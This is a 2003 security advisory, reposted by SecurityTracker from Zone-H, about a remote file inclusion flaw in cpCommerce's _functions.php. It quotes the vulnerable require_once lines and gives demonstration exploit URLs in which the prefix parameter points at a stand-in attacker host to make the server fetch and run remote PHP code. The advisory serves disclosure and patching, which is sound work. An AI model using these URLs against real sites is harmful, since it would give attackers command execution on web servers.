cpCommerce Include File Flaw Lets Remote Users Execute Arbitrary Commands on the Target System
|
|
SecurityTracker Alert ID: 1007957 |
|
SecurityTracker URL: http://securitytracker.com/id/1007957
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 20 2003
|
Impact:
Execution of arbitrary code via network, User access via network
|
Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 0.05f
|
Description:
Zone-H reported an include file vulnerability in cpCommerce. A remote user can execute arbitrary commands on the target server.
The _functions.php file includes some files relevant to the $prefix variable. A remote user can specify a remote location for the $prefix variable to include and execute arbitrary files on the target server.
A demonstration exploit URL is provided:
http://[target]/path_of_cpcommerce/_functions.php?prefix=http://[attacker]/index
PHP code, including operating system commands, in the remote file will be executed on the target system. The code will run with the privileges of the target web server process.
|
Impact:
A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web server.
|
Solution:
No solution was available at the time of this entry.
The vendor had reportedly issued a fix at the following URL, but at the time of this entry, the vendor had retracted the fix as well as the entire web site:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
|
Vendor URL: cpcommerce.org/forums/index.php?board=2;action=display;threadid=864 (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 19 Oct 2003 12:11:17 +0200
Subject: ZH2003-31SA (security advisory): file inclusion vulnerability in
|
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce
Published: 19 October 2003
Name: cpCommerce Affected Versions: 0.05f (and other versions?)
Vendor: http://www.cpcommerce.org
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)
Description
**********
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".
Details
**********
There's a file inclusion vulnerability in the _functions.php file, line 13-14:
require_once("{$prefix}_config.php");
require_once("{$prefix}_gateways.php");
Is it possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).
To test the vulnerability try this:
http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index
In this way the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed on
the server.
Solution
**********
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.
The patch is avaible here:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.
Suggestions
**********
Fix the script with the patch proposed by the author.
Link to ariginal article here:
http://www.zone-h.org/en/advisories/read/id=3284/
Astharot - Zone-H Admin
--
http://www.zone-h.org - astharot@zone-h.org
PGP Key: http://www.gife.org/astharot.asc
Linux User #292132
|
|
